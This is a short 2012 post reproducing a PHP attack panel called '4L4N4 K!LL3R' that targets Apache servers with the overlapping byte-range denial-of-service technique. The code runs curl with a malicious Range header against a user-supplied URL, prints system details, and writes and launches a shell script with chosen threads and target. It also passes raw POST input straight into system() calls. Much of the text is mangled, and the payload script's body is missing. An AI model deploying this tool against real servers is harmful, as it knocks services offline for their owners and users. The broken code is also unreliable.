febrero 07, 2012
22:09

Apache killer exploit

~=4L4N4 K!LL3R by S4(uR4=~
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0             __      __   __                   __                           1
1           /'__`\  /'__`\/\ \__              /'__`\                         0
0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
1                                                                            0 
0                                                                            1
1                                       >> 4L4N4 K!LL3R                      0
0                                       >> author : S4(uR4                   1
1                                       >> sanjar[at]xakep[dot]ru            0
0                                       >> Priv8 v.0.1                       1
1                                       >> )c(  2011                         0
0                                                                            1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0

[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::

TESTED URL :
"; //if(!empty($_POST[0])){ echo "
"."[+] Server Test Running :
";
       echo "
"; system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]); echo "
"; ?>

[ATACK] ::

REQUEST :
THREADS :
URL :

[LOG] ::

PWD :: ".`pwd`; echo "
SYSTEM :: ".`uname -a`; echo "
ID :: ".`id`; echo "
DATE :: ".`date`."

"; $tmp1 = "alana_kill3r.sh"; `touch alana_kill3r.sh`; $apache_killer = <<[x] Can't open file ($tmp1)
"; exit; } if (fwrite($handle, $apache_killer) === FALSE) { echo "[x] Can't write file ($tmp1)"; exit; } echo "
"."[+] ALL OK, xpl0it Writed"; fclose($handle); } else { echo "
[x] File $tmp1 has not access to write"; } ?>
";
$pwd = "-al";
system("ls ".$pwd);
echo "
"; echo "
"."[+] Xploit Started with :
";
       `chmod +x`.$tmp1;
       echo "
root@r00tw0rm:$ "; system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]); echo "
"; ?>